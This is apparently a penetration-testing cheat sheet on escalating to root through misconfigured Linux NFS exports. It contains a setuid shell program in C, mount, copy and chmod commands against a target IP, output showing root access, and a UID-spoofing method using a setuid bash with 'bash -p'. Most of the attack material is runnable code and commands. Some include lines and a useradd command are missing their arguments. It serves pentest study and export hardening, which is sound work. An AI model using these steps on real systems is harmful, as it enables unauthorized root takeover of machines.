# Weak NFS Privileges Network File System (NFS) allows users to access shared files or directories over the network hosted on Unix/Linux systems. NFS uses TCP/UDP port 2049. Any accessible mounts can be listed remotely by issuing the command `showmount -e`, which lists the NFS server's export list (or the access control list for filesystems) that NFS clients. When an NFS volume is created, various options can be set: | **Option** | **Description** | | ---------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `root_squash` | If the root user is used to access NFS shares, it will be changed to the `nfsnobody` user, which is an unprivileged account. Any files created and uploaded by the root user will be owned by the `nfsnobody` user, which prevents an attacker from uploading binaries with the SUID bit set. | | `no_root_squash` | Remote users connecting to the share as the local root user will be able to create files on the NFS server as the root user. This would allow for the creation of malicious scripts/programs with the SUID bit set. | ```yaml Intrusionz3r0@htb[/htb]$ cat /etc/exports # /etc/exports: the access control list for filesystems which may be exported # to NFS clients. See exports(5). # # Example for NFSv2 and NFSv3: # /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check) # # Example for NFSv4: # /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check) # /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check) # /var/nfs/general *(rw,**no_root_squas**h) /tmp *(rw,no_root_squash) ``` First, create a simple setuid binary, mount the directory locally as root user, copy it, and set the necessary permissions as root user. ```c #include #include #include #include int main(void) { setuid(0); setgid(0); system("/bin/bash"); } ``` ```bash #Create our exploit Intrusionz3r0@htb[/htb]$ gcc shell.c -o shell -static #as root in your attack machine execute the next commands root@htb[/htb]$ sudo mount -t nfs 10.129.2.12:/tmp /mnt root@htb[/htb]$ cp shell /mnt root@htb[/htb]$ chmod u+s /mnt/shell ``` Go back the target machine and just execute it. ```bash htb@NIX02:/tmp$ ./shell root@NIX02:/tmp$ id uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(htb) ``` ## Privilege Escalation via UID Spoofing and NFS Misconfiguration (with `bash -p`) In insecure NFS environments, privilege escalation can be achieved by spoofing a UID and abusing file operations through shared directories. A common technique involves using `bash -p`, which preserves the effective UID when the binary has the setuid bit. **🔧 Steps to Exploit:** 1. **Identify a Target UID:**\ Find the UID of a privileged user (e.g., through `/etc/passwd` or file ownership within the NFS share). 2. **Create a Local User with Matching UID (on Attacker's Machine):** ```bash sudo useradd -u --badname -p '' ``` 3. **Upload Bash Binary to NFS (from Compromised Account):**\ Use an account (e.g., `www-data`) with write access to place a local `bash` binary into the shared NFS directory: ```bash cp /bin/bash /path/to/nfs/share/bash ``` 4. **Set SetUID Bit on the Bash Binary (from Attacker’s Machine):** ```bash mv bash /tmp/ chmod u+s /tmp/bash mv /tmp/bash /path/to/nfs/share/ ``` 5. **Execute Bash with Preserved UID (on Target):**\ From the target system, the low-privileged user can run: ```bash ./bash -p ``` This launches a shell with the effective privileges of the spoofed UID (typically a higher-privileged user).